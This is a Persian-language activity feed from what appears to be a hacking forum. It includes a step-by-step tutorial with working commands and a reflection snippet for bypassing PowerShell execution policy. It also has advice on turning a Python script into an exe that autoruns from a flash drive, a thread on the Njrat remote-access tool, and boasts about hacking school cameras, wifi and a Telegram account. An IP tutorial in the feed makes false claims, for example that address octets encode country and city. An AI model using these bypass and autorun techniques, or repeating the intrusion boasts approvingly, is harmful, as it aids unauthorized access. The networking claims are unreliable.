تمامی فعالیت ها

این جریان به طور خودکار بروزرسانی می شود     

  1. امروز
  2. lordwhite404

    اموزش طراحی ربات

    این تاپیک رو ادامه نمیدید؟🙄
  3. با سلام خدمت شما دوست عزیز وقت شما هم بخیر در جواب اینکه آیا سیستم عامل لینوکس نیاز به آنتی ویروس داره یا نه طبق چیزی که من میدونم نیازی نداره ! چرا !؟ چون برای اینکه یه ویروس بتونه یه سیستم آلوده کنه نیاز به مخفی شدن داره همچنین باید در اجرا و تکثیر بیشتر خودش هم موفق باشه که همچین چیزی توی لینوکس تقریبا غیر ممکن هست ! ویروس‌ها برای موفقیت خودشون نیاز به آلوده کردن فایل‌های اجرایی باینری توی سیستم عامل دارن ! لینوکس هم به شکلی ساخته شده که تقریبا همه فایل‌های مهم سیستم و فایل‌های اجرایی اصلیدر دسترس اختیار کاربر روت یا همون ریشه که بالاترین سطح دسترسی در لینوکس داره هست ! کاربر عادی هم فقط میتونه فایل ها اجرا کنه ! پس این این کار باعث میشه تقریبا ویروسی نتونه وارد سیستم عامل شما بشه البته تقریبا ! چون هیچ امنیتی صد در صد نیست ! با این کار لینوکس درصد ویروسی شدن سیستم عامل به کمترین میزان خودش میرسه ! یعنی وقتی که کاربر با سطح دسترسی کاربر عادی از سیستم عامل استفاده میکنه اگر ناخواسته ویروسی اجرا هم بکنه و ویروس هم قصد داره که توی فایل‌های اجرایی مهم خرابکاری کنه موفق نمیشه ! چون نیاز داره حتما کاربر روت باشه ! خب جدا از همه اینها اگر هم خواستید آنتی ویروسی نصب کنید پیشنهاد من برای شما آنتی ویروس متن باز ClamAV هست ! این آنتی ویروس برای شناسایی تروجان ها و ویروس ها و برنامه های مخرب و ... استفاده میشه ! آموزش نصب ClamAV : ترمینال باز کنید و بعد هم دستورات وارد کنید : sudo apt-get update دستور نصب ابزار : sudo apt-get install clamav برای کارایی بهتر قبل اجرا و بعد از نصب با دستور زیر دیتابیس ابزار خودمون آپدیت میکنیم : freshclam برای اسکن سریع هم کافیه توی ترمینال دستور زیر وارد کنید : (همون کوییک اسکن خودمونه) clamscan برای آشنایی با دستورات هم دستور زیر وارد کنید : clamscan --help موفق باشید .
  4. سلام وقت بخیر از دوستان با تجربه یه سوال داشتم، آیا واقعا نصب آنتی ویروس روی لینوکس لازمه که دوباره درباره اش حرف میزنن؟ منظورم برای نگهداری از فایلها و آسیب های احتمالی از ویروس هاست. و اینکه شما خودتون اگر استفاده میکنید، اسم آنتی ویروستون چیه و روی کدوم توزیع لینوکس نصبش کردین؟ ممنون میشم راهنمایی کنید.
  5. دیروز
  6. king_iman18

    چی شد که هکر شدین؟

    ضمن عرض سلام و خسته نباشید خدمت همه دوستان گرامی با کسب اجازه از محضر همه بزرگترای خودم چون برادر بزرگترم تو این عرصه فعالیت داشت از بچگی با کامپیوتر سرو کار داشتم و خب از همون اول با کامپیوتر بزرگ شدم و این شد که رشته شبکه رو انتخاب کردم و دارم ازش نون در میارم
  7. هفته گذشته
  8. Mohadese2003

    چی شد که هکر شدین؟

    ایدی این دوتا عزیزی ک گفتیو میشه بدی مرسی:)))))
  9. king_iman18

    اولین تجربه هک یا امنیتتون؟!؟

    من اولین بار به دوربینای مدرسه وصل شدم 🤣 متاسفانه فهمیدن دهنمون صاف شد
  10. بله میشه وقتی به exe تبدیل میشه هر ویندوزی میتونه اون رو بخونه
  11. سوکت نویسی هنوز یاد نگرفتم متاسفانه اگه میشه با سوکت خب چه بهتر بیخیال این میشم icon.ico اسم عکسه قربان بعد یه سوال اگر تو سیستمی پایتون نصب نبود طبق چیزی که شما میگی میشه این کارو کرد یا باید exe ش کرد
  12. با سلام خدمت شما دوست عزیز معذرت میخوام اما میشه بدونم که چرا ایکون مساوی ایکون . ایکو قرار دادید؟ و از طرفی دیگه شما بجای اینکه اوتوران کنی و رد پا از خودت به اجرا بزاری با استفاده از یه پروگرامر و سوکت تو پایتون خیلی راحت تر نمیتونی بوتیبل کنی و اوتوران خود پایتون قرار بدی تا رد پا ازت نمونه؟ ببخششید سوالم طولانی شد!
  13. درستش کردم exe کردم بازم نمیشه
  14. این فایل پایتونه معلومه که اجرا نمیکنه این که نمیاد دنبال کامپایلر بگرده آخه شما باید این فایل py رو با pipinstaller به exe تبدیل کنید تا کار بده
  15. اقا من همین کارو کردم پس چرا فلش رو اجکت میکنم دوباره میزنم نمیشه ؟
  16. ! جهان سوم جایی هست که به دخترای عینکی میگن خانم مهندس به پسرای عینکی میگن ج*ی !

    ! پس همه حرفای پشتت به ت*مت !

  17. Mohadese2003

    اولین تجربه هک یا امنیتتون؟!؟

    😂😂😂من اولین بار وایفای مدرسمو هک کردم
  18. lordwhite404

    عدم نمایش کانتکس در اینستاگرام

    سلام دوست عزیز اگر واقعا لازم دارید نسخه های قدیمی تر این برنامه رو تست کنید همچنین این برنامه نسخه لایت هم داره که اون رو هم میتونید تست کنید اگر یک باگ باشه هم که طی اپدیت جدید برطرف میشه و مشکل خاصی نیست
  19. lordwhite404

    اولین تجربه هک یا امنیتتون؟!؟

    مرسی که تا اینجا دوستان تجربه هاشونو گفتن لطفا همه بگید❤️
  20. mownten

    اولین تجربه هک یا امنیتتون؟!؟

    سال 88 پیدا کردن یک باگ در بلوتوث HTC WILDFIRE S که به نوکیا گزارش دادم. اولین شل هم مربوط به باگ overflow توی پورت 445 یا 443 بود که یه ویدیو ازش درست کردم و گذاشتم توی بلاگفا و فیلتر شد و از دست رفت. از اولین آموزش های تصویری این مدلی توی سطح نت بود که انگشت شمار بهش تسلط داشتن. یک ساعت با سرعت 20کیلوبایت مینشستم تا متااسپلویت 2.3 با حجم 50 مگ دانلود بشه. اونم با دانلودر IE . هیع چه روزگاری.
  21. SinaSalimi

    Njrat 7.0 Full Version

    با برنامه تغییر ای پی امتحان کن
  22. جدیدا
  23. بررسی policy ها در powershell و روش های دور زدن آنها همون طور که می دونید در powershell به جهت جلوگیری از اجرا شدن اسکریپت های خطرناک و جلوگیری از دسترسی های راه دور و … مایکروسافت یک سری محدودیت ها و policy ها تعریف کرده که می توان توسط کاربر تنظیم شود . این محدودیت ها در سطوح محتلف کاربری اعمال می شود. جهت تعریف این policy ها می توانیم از فرمان Set-ExecutionPolicy در powershell استفاده کنیم . با استفاده از این فرمان می توانیم تعیین کنیم که آیا کاربران در گروه های کاربری مختلف حق اجرای اسکریپت را دارند یا خیر ؟ این فرمان دارای چند نوع مجوز است. Restricted : که اجازه اجرای اسکریپت را به طور کل به هیچ کاربری نمی دهد AllSigned : تنها اسکریپت هایی که دارای امضای یک ناشر مورد اعتماد شرکت مایکروسافت قابل اجرا است. RemoteSigned : تنها اسکریپت هایی که دارای امضای دیجیتالی قابل اعتماد در سطح اینترنت است قابل اجرا است. Unrestricted : تمامی اسکریپت ها قابل اجرا می باشد فقط قبل از اجرای یگ اسکریپت در سطح اینترنت از شما سوال پرسیده می شود . Bypass : همه ی اسکریپت ها قابل اجرا می باشد و هیچ سوالی هم پرسیده نمی شود Undefined : جهت حذف سیاست های امنیتی بالا مورد استفاده قرار می گیرد شما می توانید با استفاده از فرمان زیر سیاست های بالا را اعمال کنید. Set-ExecutionPolicy Restricted که باعث جلوگیری از اجرای اسکریپت توسط کار بر می شود Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Restricted همچنین می توان بر روی یک دامنه ی زیر این محدودیت ها را اعمال کرد. MachinePolicyUserPolicyProcess CurrentUser LocalMachine در نهایت جهت دیدن لیستی از سیاست های امنیتی بر روی دامنه ها را با استفاده از فرمان زیر مشاهده کنید . PS C:\Users\Administrator> Get-ExecutionPolicy -List | Format-Table -AutoSize Scope ExecutionPolicy --------------- ----- MachinePolicy Undefined UserPolicy Undefined Process Undefined CurrentUser Unrestricted LocalMachine Unrestricted خوب حالا ما با استفاده از فرمان بالا اجرای اسکریپت را در سطح حساب کاربریمان می بندیم و سپس به شما نشان می دهیم که چگونه می توان آن محدودیت ها را دور زد . و اسکریپت خود را اجرا نمود . اول از همه یک فرمان ۲ خطی می نویسیم و آن را با پسوند PS1 ذخیره می کنیم به عنوان مثال فرمان Write-Host “BYPASSED” calc.exe حال اگر بخواهیم در حالت عادی آن را اجزا کنیم با خطای زیر مواجه می شویم. PS C:\test> .\a.PS1 .\a.PS1 : File C:\test\a.PS1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + .\a.PS1 + ~~~~~~~ + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess روش های زیر جهت دور زدن سیاست های امنیتی در پاورشل ویندوز است. PS C:\test> Get-Content .\a.PS1 | PowerShell.exe -noprofile - BYPASSED PS C:\test> و PS C:\test> get-content .\a.PS1 | powershell.exe - bypassed PS C:\test> و همچنین نقطه مقابل دستور get-content در CDM که دستور Type می باشد. PS C:\test> TYPE .\a.ps1 | PowerShell.exe -noprofile - bypassed PS C:\test> همپنین می توان با استفاده از فرمان invoke-expression و pipline به گونه ای دیگر دستور را فراخوانی کرد. PS C:\test> Get-Content .\a.PS1 | Invoke-Expression bypassed PS C:\test> TYPE .\a.ps1 | Invoke-Expression bypassed می توان از کلمه ی اختصاصی فرامین نیز استفاده کرد Get-content = GC Invoke-expression = IEX PS C:\test> GC .\a.PS1 | iex bypassed می توان به خود فرمان ExecutionPolicy گفت که این یک فایل را در نظر نگیر PS C:\test> PowerShell.exe -ExecutionPolicy Bypass -File .\a.PS1 bypassed و یا خیر بگوییم سطح دسترسی را برای این فایل تغییر بده PowerShell.exe -ExecutionPolicy UnRestricted -File .\a.ps1 bypassed همچنین می توان با فراخوانی توابع بدون استفاده از تابع AuthorizationManager نیز این کار را انجام داد برای اینکار می توانید داخل profile های powershell یک تابع با نام دلخواه انتخاب کنید که من این جا نام آنرا d-exe می زاریم function D-Exe {> ($ ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,").setvalue($ctx, (new- object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell")) } و سپس می توان فایل را اجرا کنید . PS C:\test>D-exe .\a.PS1 bypassed همچنین می توان با تغییر در رجیستری این کار را انجام داد HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShellExecutionPolicy و می توانید مقدار ExecutionPolicy را به مقدار Unrestricted را تغییر داد .و در نهایت فایل را مستقیم به صورت معمولی انجام داد . PS C:\test>.\a.PS1 bypassed همچنین می توانید از طریق CMD هم سویچ کنید به powershell و اسکریپت داخل آن را اجرا کنید کافیست یک فایل Bat ایجاد کنید و در آن کد زیر را کپی نمایید . @echo off REM: Bypass.bat REM: cmd /C a.bat a.ps1 powershell.exe -noprofile -Command "powershell.exe -noprofile -encodedCommand ([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((gc %1 |%%{$_}|out- string))))" و سپس در cmd فرمان زیر را وارد کنید. a.bat a.ps1 و می بینید که کد اجرا می شود . یعنی در اصل ما توانستیم با استفاده از فرامین مختلف policy مربوط به powershell که توسط فرمان Set-executionpolicy انجام می شود را دوز بزنیم و فایل و یا اسکریپت خود را اجرا کنیم . امیدوارم مفید بوده باشد .
  24. lordwhite404

    اولین تجربه هک یا امنیتتون؟!؟

    من خودم مهندسی اجتماعی بود یعنی یارو رو متقاعد کردم که کد تلگرامشو بده 🤣
  25. H.R.X

    اولین تجربه هک یا امنیتتون؟!؟

    هک کردن وایفای
  26. :IP IP: هر سیستمی به هر روشی که به اینترنت وصل بشه یک IP اختصاصی از ISP خودش میگیره تمامی این آی پی ها از شرکت IANA آمریکا که شرکتی است که به تمای دنیا آی پی میفروشه (چون مال شرکت آمریکاست تمامی آی پی های رند رو برای خودش نگه می داره) دوتا سایت وجود داره که شما می تونید IP کشور های مختلف رو بررسی قرار دهید. nirsoft.net dnsstuff.com برای اینکه IP خودمون رو بدست بیاریم (IP valed) کافیه در گوگل عبارت IP Address رو سرچ کنیم مثال 2.196.70.36 اما برای بدست آوردن آی IP invaled کافیه در محیط ران (فشار دارد همزمان کلیک های windows+R) عبارت cmd را تایپ کنید و اینتر سپس در محیط ران عبارت ipconfig را تایپ کنید و اینتر مثال 169.264.240.116 (که آی پی اینولید به کار هکر ها نمیاد مهم آی پی ولید شماست) این IP بعد از هر (.) یکه معنی خاصی داره: عدد اول (2): نشان دهده کشور شماست عدد دوم (196): نشان دهده شهر شماست عدد سوم (70): نشان دهده منطقه شماست عدد آخر (36): نشان دهنده isp شماست که از چه isp استفاده میکنید ISP: isp (مخفف internet service provider) یا ارائه دهنده خدمات اینترنتی سازمان یا شرکتی است که به کاربران امکان اتصال به اینترنت و استفاده از آن را می دهد. درواقع میتوان به آن واسطه میان کاربر و اینترنت گفت. آی پی ها برای مشخص کردن مکان شما هم هستند (خیلی از هکر ها که بعد از عملیات نفوذ دستگیر میشن بخاطر لو رفتن همین IP می باشد) آی پی ها در کل دونمونه هستند. IPv4 IPv6 IPv6 فعلا خیلی کمه و به خیلی از کشور ها هنوز داده نشده آی پی های ورژن 6 رو جایگزین آی پی های ورژن 4 می کنه میشه گفت دلیل اومد IPv6 بخاطر تموم شدن IPV4 بوده که هم امنیت بیشتری داره هم گستردکی بیشتری داره چون ترکیبی از حروف و اعداد میباشد. NAT: امنیت دنیای شبکه ای که اینترنت هست رو تامین میکنه کار nat اینکه میاد این امکان را فراهم میکنه که تمامی کامپیوتر هایی که درون یک شبکه هستند رو به وسیله IP invaled وصل میکنه. اما از کجا بفهمیم ما پشت nat قرار گرفته ایم؟ درصورتی که آی پی ipaddress ما با آی پی ipconfig ما فرق داشت یعنی ما پشت nat قرار گرفته ایم امنیت آی پی به دو نوع است: SSL IPSEC SSL بر روی یک سایت برای امنیت مشتری اون سایت میباشد مثل بانک ها ایمیل ها و ... که دو نوع هسند پولی و رایگان IPSEC که سیستمی میباشد میاد تمام پکت هایی که ارسال یا دریافت میکنه رو رمزنگاری میکند. مخفی کردن آی پی از دست هکر ها: RUN=> mmc=> ok=> File=> Add/Remove Snap-in...=> IP Security Policy Management=>Add=>IP(...)=>Finish=>ok=>Save در صفحه ران mmc را تایپ کنید و ok سپس در پنجره بازشده سربرگ File را انتخاب و گزینه Add/Remove Snap-in را انتخاب نمایید. در پنجره باز شده IP Security Policy Management را پیدا کرده و کلیک کنید و سپس گزینه Add را کلیک کنید. در پنجر باز شده IP خود را معرفی کنید سپس گزینه Finish را انتخاب کنید و در پایان گزینه ok را انتخاب و save نمایید
  1. نمایش فعالیت های بیشتر